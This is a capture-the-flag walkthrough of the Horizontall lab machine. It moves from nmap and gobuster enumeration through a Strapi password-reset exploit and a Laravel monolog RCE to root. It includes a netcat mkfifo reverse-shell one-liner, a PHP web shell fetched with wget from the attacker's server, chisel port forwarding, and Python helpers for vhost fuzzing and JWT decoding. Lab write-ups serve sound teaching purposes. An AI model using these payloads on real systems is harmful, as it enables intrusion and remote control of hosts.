Hack. Sleep. Repeat



As always we start with an nmap scan, first a fast sweep of all TCP ports to see what is open:

nmap -p- --min-rate 10000 -oA nmap/allports -v IP
# Nmap 7.91 scan initiated Thu Dec 30 08:30:37 2021 as: nmap -p- --min-rate 10000 -oA nmap/allports -v
Warning: giving up on port because retransmission cap hit (10).
Increasing send delay for from 320 to 640 due to 570 out of 1899 dropped probes since last increase.
Increasing send delay for from 640 to 1000 due to 1398 out of 4658 dropped probes since last increase.
Nmap scan report for
Host is up (0.24s latency).
Not shown: 52107 closed ports, 13426 filtered ports
22/tcp open  ssh
80/tcp open  http

Read data files from: /usr/bin/../share/nmap
# Nmap done at Thu Dec 30 08:31:48 2021 -- 1 IP address (1 host up) scanned in 70.64 seconds

Two open ports. We can already guess SSH and HTTP, but let's run service detection and the default scripts against them to confirm versions, which matter later for picking exploits.

nmap -sC -sV -oA nmap/normal -p 22,80 IP
# Nmap 7.91 scan initiated Thu Dec 30 08:32:40 2021 as: nmap -sC -sV -oA nmap/normal -p 22,80
Nmap scan report for horizontall.htb (
Host is up (0.35s latency).

22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 ee:77:41:43:d4:82:bd:3e:6e:6e:50:cd:ff:6b:0d:d5 (RSA)
|   256 3a:d5:89:d5:da:95:59:d9:df:01:68:37:ca:d5:10:b0 (ECDSA)
|_  256 4a:00:04:b4:9d:29:e7:af:37:16:1b:4f:80:2d:98:94 (ED25519)
80/tcp open  http    nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: horizontall
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at .
# Nmap done at Thu Dec 30 08:32:58 2021 -- 1 IP address (1 host up) scanned in 18.10 seconds

That is more useful: OpenSSH 7.6p1 and nginx 1.14.0 on Ubuntu, and the HTTP title gives away the hostname horizontall.htb. We will look at HTTP first. Make sure to add a line with the target IP and horizontall.htb to your hosts file so the name resolves.


Next, check the page source. It gives nothing useful, so let's brute-force directories and then virtual hosts to look for hidden content.

└─$ gobuster dir -u http://horizontall.htb/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x txt,php,html,bak,sh -o gobuster.req
/index.html           (Status: 200) [Size: 901]
/img                  (Status: 301) [Size: 194] [--> http://horizontall.htb/img/]
/css                  (Status: 301) [Size: 194] [--> http://horizontall.htb/css/]
/js                   (Status: 301) [Size: 194] [--> http://horizontall.htb/js/]

Nothing beyond the static asset directories on the main domain, so let's try virtual host discovery.

└─$ gobuster vhost -u http://horizontall.htb/ -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt  
Found: api-prod.horizontall.htb (Status: 200) [Size: 413]

Boom, we got a subdomain: api-prod.horizontall.htb. Add it to the hosts file as well and open it to see what it serves.
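To show what gobuster vhost is doing under the hood, here is an added Python example (my own code, not from this write-up or from the gobuster project) that fuzzes the Host header the same way: request a random hostname that cannot exist to get a baseline, then flag every candidate whose status or body length differs from it. `http_fetch`, `find_vhosts` and `fake_server` are my names; the fake server is constructed for the demonstration and only reuses the hostname and body sizes seen in the gobuster output above.

```python
import http.client
import secrets
from typing import Callable, Iterable, List, Tuple

# (status, body length) is what the vhost fuzzer compares against its baseline.
Response = Tuple[int, int]
Fetcher = Callable[[str], Response]


def http_fetch(target_ip: str, port: int = 80, timeout: float = 5.0) -> Fetcher:
    """Return a fetcher that GETs / from target_ip with an arbitrary Host header.
    The IP is given directly, so no DNS or hosts-file entry is needed."""
    def fetch(host_header: str) -> Response:
        conn = http.client.HTTPConnection(target_ip, port, timeout=timeout)
        try:
            conn.request("GET", "/", headers={"Host": host_header})
            resp = conn.getresponse()
            return resp.status, len(resp.read())
        finally:
            conn.close()
    return fetch


def find_vhosts(domain: str, words: Iterable[str], fetch: Fetcher) -> List[Tuple[str, int, int]]:
    """Flag candidate vhosts whose (status, size) differs from the baseline.
    Baseline = the server's answer for a random hostname that cannot exist,
    i.e. whatever the default/catch-all vhost serves."""
    baseline = fetch(f"{secrets.token_hex(8)}.{domain}")
    hits = []
    for word in words:
        host = f"{word}.{domain}"
        status, size = fetch(host)
        if (status, size) != baseline:
            hits.append((host, status, size))
    return hits


def fake_server(host_header: str) -> Response:
    """Constructed stand-in for the target (no network): the default site is
    901 bytes and only api-prod answers with a different, 413 byte body."""
    if host_header == "api-prod.horizontall.htb":
        return 200, 413
    return 200, 901


if __name__ == "__main__":
    # Against a live box: fetch = http_fetch("<target-ip>") plus a real word list.
    # Here we run a handful of constructed candidates against the simulated server.
    for hit in find_vhosts("horizontall.htb", ["www", "api", "api-prod", "dev"], fake_server):
        print("Found:", hit)
```

Comparing only status and size is exactly the weakness of this technique: a vhost whose page happens to be the same length as the catch-all page is missed, so on a real engagement also hash the body or diff a few headers.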


It only returns a welcome message and nothing else, so I tried appending /admin to the subdomain (you could also brute-force directories and you would find it). I just guessed it, and boom, it worked.


We are dealing with a Strapi CMS admin login. A few default credentials got us nowhere, so let's see what Google has on it.



We found the version, so let's confirm whether that version is vulnerable.


Boom. Let's download the exploit and try it. Note that it works by resetting the admin password, so it is noisy and changes state on the target.

└─$ python3 http://api-prod.horizontall.htb/
[+] Checking Strapi CMS Version running
[+] Seems like the exploit will work!!!
[+] Executing exploit

[+] Password reset was successfully
[+] Your email is: admin@horizontall.htb
[+] Your new credentials are: admin:SuperStrongPassword1
[+] Your authenticated JSON Web Token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNjQxMzAxNDYxLCJleHAiOjE2NDM4OTM0NjF9.50jv0hWWZ3KBCn-U0EIA2qNHkE7e4ddOrksf0yQuzbI
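The exploit hands back a JWT. Before doing anything with it, it is worth looking at what it actually claims, because that tells you which account you now hold, whether it is an admin and how long the token stays valid. The added Python below is my own code, not from the page or the exploit; it decodes the header and payload of the token printed above without verifying the signature (`decode_jwt_unverified`, `summarise_token` and `_b64url_decode` are my names). Decoding without verification is only for inspecting a token you already hold, never for deciding whether to trust one.

```python
import base64
import json
from datetime import datetime, timezone
from typing import Any, Dict, Tuple

# The token printed by the exploit above, copied from this write-up.
TOKEN = ("eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
         "eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNjQxMzAxNDYxLCJleHAiOjE2NDM4OTM0NjF9."
         "50jv0hWWZ3KBCn-U0EIA2qNHkE7e4ddOrksf0yQuzbI")


def _b64url_decode(segment: str) -> bytes:
    # JWT segments are base64url with the '=' padding stripped; put it back.
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def decode_jwt_unverified(token: str) -> Tuple[Dict[str, Any], Dict[str, Any]]:
    """Return (header, payload) of a compact JWS WITHOUT checking the signature.
    Fine for inspecting a token you already hold; never use this to accept one."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("expected three dot-separated segments")
    return json.loads(_b64url_decode(parts[0])), json.loads(_b64url_decode(parts[1]))


def summarise_token(token: str, now: int) -> Dict[str, Any]:
    """Pull out what matters operationally: which account, whether it is an
    admin, how it is signed, and how long it stays valid."""
    header, payload = decode_jwt_unverified(token)
    iat, exp = payload.get("iat"), payload.get("exp")
    return {
        "alg": header.get("alg"),
        "user_id": payload.get("id"),
        "is_admin": bool(payload.get("isAdmin", False)),
        "issued_at": datetime.fromtimestamp(iat, tz=timezone.utc).isoformat() if iat else None,
        "lifetime_days": (exp - iat) / 86400 if iat and exp else None,
        "expired": exp is not None and now >= exp,
    }


if __name__ == "__main__":
    info = summarise_token(TOKEN, now=int(datetime.now(tz=timezone.utc).timestamp()))
    for key, value in info.items():
        print(f"{key:>14}: {value}")
```

For the token above this reports user id 3 with isAdmin set, signed with HS256 and valid for 30 days from when it was issued, so it keeps working long after the box is rebooted, which is worth knowing both as an attacker and as a defender rotating the Strapi JWT secret after an incident.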


We are in, but when I tried to run a command I got an error.


Smooth. Let's use that to send ourselves a reverse shell.

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 1234 >/tmp/f

Ncat listening to catch the reverse shell. Whatever port you put in the payload is the one the listener has to be bound to, so double-check they match before firing it.

└─$ nc -nvlp 1337 
listening on [any] 1337 ...


Boom, much better. Let's upgrade it to a full TTY shell.


Now let's grab user.txt first.


Boom. Now let's try to escalate our privileges.


I found credentials, but when I tried them for the developer user I got no luck, so let's check for SUID binaries.


Nothing there either, so let's see which ports are listening locally on the box.

ss -tulpn


Boom, there is a service bound only to localhost, which is why nmap never saw it. Let's port-forward it with chisel. First we need to transfer a copy of the chisel binary to the target.


Now start the chisel server on our attacking machine in reverse mode:

./chisel server -p 9000 --reverse &


Then on the target, connect back to it and set up the reverse forward:

./chisel client R:9001: &


Now we can reach the internal service from our own machine.
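To make the "what is listening locally" step repeatable, here is an added Python example (mine, not from this write-up) that parses `ss -tulpn` output, picks out the listeners bound only to loopback, and builds the matching `R:` argument for the chisel reverse forward shown above. The `ss` listing inside the block is constructed for illustration, so its ports and process names are not the box's; `parse_ss`, `loopback_only` and `chisel_remote_spec` are my names.

```python
import re
from typing import List, NamedTuple


class Listener(NamedTuple):
    proto: str
    addr: str
    port: int
    process: str


# Constructed sample of `ss -tulpn` output for illustration; it is NOT the
# box's real listing, and the ports and process names are made up.
SAMPLE_SS = """\
Netid  State   Recv-Q  Send-Q   Local Address:Port   Peer Address:Port  Process
udp    UNCONN  0       0        127.0.0.53%lo:53     0.0.0.0:*          users:(("systemd-resolve",pid=700,fd=12))
tcp    LISTEN  0       128      0.0.0.0:22           0.0.0.0:*          users:(("sshd",pid=900,fd=3))
tcp    LISTEN  0       511      0.0.0.0:80           0.0.0.0:*          users:(("nginx",pid=1000,fd=6))
tcp    LISTEN  0       128      127.0.0.1:8088       0.0.0.0:*          users:(("php",pid=1200,fd=5))
tcp    LISTEN  0       80       127.0.0.1:3306       0.0.0.0:*
tcp    LISTEN  0       128      [::]:22              [::]:*             users:(("sshd",pid=900,fd=4))
"""

_LOCAL_RE = re.compile(r"^(?P<addr>.+):(?P<port>\d+)$")
_PROC_RE = re.compile(r'users:\(\("(?P<name>[^"]+)"')


def parse_ss(output: str) -> List[Listener]:
    """Parse `ss -tulpn` lines into Listener records (process '?' when ss
    could not show it, e.g. a socket owned by another user)."""
    listeners = []
    for line in output.splitlines():
        fields = line.split()
        if len(fields) < 6 or fields[0] == "Netid":
            continue
        m = _LOCAL_RE.match(fields[4])
        if not m:
            continue
        addr = m.group("addr").split("%")[0]      # drop the %iface scope suffix
        proc = _PROC_RE.search(line)
        listeners.append(Listener(fields[0], addr, int(m.group("port")),
                                  proc.group("name") if proc else "?"))
    return listeners


def loopback_only(listeners: List[Listener]) -> List[Listener]:
    """Services bound only to loopback: reachable from the box, invisible to
    nmap from outside, hence candidates for a reverse port forward."""
    return [l for l in listeners
            if l.addr.startswith("127.") or l.addr in ("[::1]", "::1")]


def chisel_remote_spec(local_port: int, target: Listener) -> str:
    """Build the R:<local-port>:<host>:<port> argument for `chisel client`
    so that local_port on the attacker box reaches the loopback service."""
    return f"R:{local_port}:{target.addr}:{target.port}"


if __name__ == "__main__":
    for svc in loopback_only(parse_ss(SAMPLE_SS)):
        print(f"{svc.proto} {svc.addr}:{svc.port} ({svc.process}) ->",
              chisel_remote_spec(9001, svc))
```

In practice you feed the real `ss -tulpn` output into `parse_ss`, and the `R:` spec it prints is what goes after `./chisel client <attacker-ip>:9000` on the target, with the server started with `--reverse` as above; the forwarded service then answers on port 9001 of your own machine.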


Boom, it is Laravel v8 on PHP v7.4.18 according to the version banner. Let's confirm whether that version is vulnerable.


Boom, jackpot. Let's give it a shot.

└─$ python3
[*] Try to use monolog_rce1 for exploitation.
[*] Result:
uid=0(root) gid=0(root) groups=0(root)

[*] Try to use monolog_rce2 for exploitation.
[*] Result:
uid=0(root) gid=0(root) groups=0(root)

[*] Try to use monolog_rce3 for exploitation.
[*] Result:
[-] RCE echo is not found.

The exploit works, and it is already executing as root. Let's turn that into a reverse shell: edit the exploit so that its command wgets our web shell onto the server.

Save the following as shell.php (it runs whatever is passed in the cmd query parameter on the server):

<?php system($_GET['cmd']); ?>

Now start a Python web server to host it (this is the Python 2 module; on Python 3 the equivalent is python3 -m http.server):

└─$ python -m SimpleHTTPServer                       
Serving HTTP on port 8000 ...


Save the change and run the exploit again.


That confirms the file was fetched from our server; let's verify it is in place on the target.


Flashy, right? Now let's use the web shell to get a reverse shell back to our terminal.


Bruhhhhh, you just got yourself root. You are l33t. Thanks for reading my write-up, peace out.

Greetings from Muzec
